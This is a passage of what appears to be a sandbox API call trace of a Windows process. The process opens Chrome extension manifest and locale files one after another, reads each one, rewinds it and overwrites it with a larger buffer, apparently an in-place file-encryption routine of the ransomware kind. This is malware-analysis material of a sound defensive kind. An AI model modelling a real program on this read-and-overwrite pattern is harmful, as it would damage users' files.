lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2d5f2bc*=0xd5, lpOverlapped=0x0) returned 1 [0166.476] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.476] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x65d, lpOverlapped=0x0) returned 1 [0166.476] CloseHandle (hObject=0x20c) returned 1 [0166.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x11a [0166.478] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.478] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.478] ReleaseMutex (hMutex=0x168) returned 1 [0166.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.478] ReadFile (in: hFile=0x20c, lpBuffer=0x291fe38, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x291fe38*, lpNumberOfBytesRead=0x2d5f2bc*=0x11a, lpOverlapped=0x0) returned 1 [0166.479] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.479] WriteFile (in: hFile=0x20c, lpBuffer=0x2873108*, nNumberOfBytesToWrite=0x6a2, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2873108*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6a2, lpOverlapped=0x0) returned 1 [0166.480] CloseHandle (hObject=0x20c) returned 1 [0166.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.481] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.894] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd0 [0167.894] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.894] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.895] ReleaseMutex (hMutex=0x168) returned 1 [0167.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.895] ReadFile (in: hFile=0x20c, lpBuffer=0x1ed1838, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1838*, lpNumberOfBytesRead=0x2d5f2bc*=0xd0, lpOverlapped=0x0) returned 1 [0167.896] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.896] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x658, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x658, lpOverlapped=0x0) returned 1 [0167.897] CloseHandle (hObject=0x20c) returned 1 [0167.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.898] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.898] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xdb [0167.898] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.899] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.899] ReleaseMutex (hMutex=0x168) returned 1 [0167.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.899] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2d5f2bc*=0xdb, lpOverlapped=0x0) returned 1 [0167.900] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.900] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x663, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x663, lpOverlapped=0x0) returned 1 [0167.900] CloseHandle (hObject=0x20c) returned 1 [0167.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.902] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.902] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd4 [0167.902] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.902] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.902] ReleaseMutex (hMutex=0x168) returned 1 [0167.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.902] ReadFile (in: hFile=0x20c, lpBuffer=0x1ed1838, nNumberOfBytesToRead=0xd4, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1838*, lpNumberOfBytesRead=0x2d5f2bc*=0xd4, lpOverlapped=0x0) returned 1 [0167.903] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.903] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x65c, lpOverlapped=0x0) returned 1 [0167.904] CloseHandle (hObject=0x20c) returned 1 [0167.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.905] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.905] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5b1 [0167.905] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.905] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.906] ReleaseMutex (hMutex=0x168) returned 1 [0167.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0167.906] ReadFile (in: hFile=0x20c, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5b1, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x5b1, lpOverlapped=0x0) returned 1 [0167.908] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.908] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xb39, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f2d0*=0xb39, lpOverlapped=0x0) returned 1 [0167.908] CloseHandle (hObject=0x20c) returned 1 [0167.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.909] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.910] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xcf [0167.910] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.910] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.910] ReleaseMutex (hMutex=0x168) returned 1 [0167.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.910] ReadFile (in: hFile=0x20c, lpBuffer=0x1ed1838, nNumberOfBytesToRead=0xcf, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1838*, lpNumberOfBytesRead=0x2d5f2bc*=0xcf, lpOverlapped=0x0) returned 1 [0167.911] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.912] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x657, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x657, lpOverlapped=0x0) returned 1 [0167.912] CloseHandle (hObject=0x20c) returned 1 [0167.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.913] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.913] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xe3 [0167.913] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.914] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.914] ReleaseMutex (hMutex=0x168) returned 1 [0167.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.914] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xe3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2d5f2bc*=0xe3, lpOverlapped=0x0) returned 1 [0167.915] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.915] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x66b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x66b, lpOverlapped=0x0) returned 1 [0167.916] CloseHandle (hObject=0x20c) returned 1 [0167.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.917] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.917] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xac [0167.917] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.918] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.918] ReleaseMutex (hMutex=0x168) returned 1 [0167.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.918] ReadFile (in: hFile=0x20c, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xac, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x2d5f2bc*=0xac, lpOverlapped=0x0) returned 1 [0167.919] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.920] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x634, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x634, lpOverlapped=0x0) returned 1 [0167.920] CloseHandle (hObject=0x20c) returned 1 [0167.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.921] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.921] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb6 [0167.921] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.922] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.922] ReleaseMutex (hMutex=0x168) returned 1 [0167.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.922] ReadFile (in: hFile=0x20c, lpBuffer=0x26a0578, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a0578*, lpNumberOfBytesRead=0x2d5f2bc*=0xb6, lpOverlapped=0x0) returned 1 [0167.923] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.923] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63e, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x63e, lpOverlapped=0x0) returned 1 [0167.924] CloseHandle (hObject=0x20c) returned 1 [0167.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.925] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.925] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd5 [0167.925] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.926] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.926] ReleaseMutex (hMutex=0x168) returned 1 [0167.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, 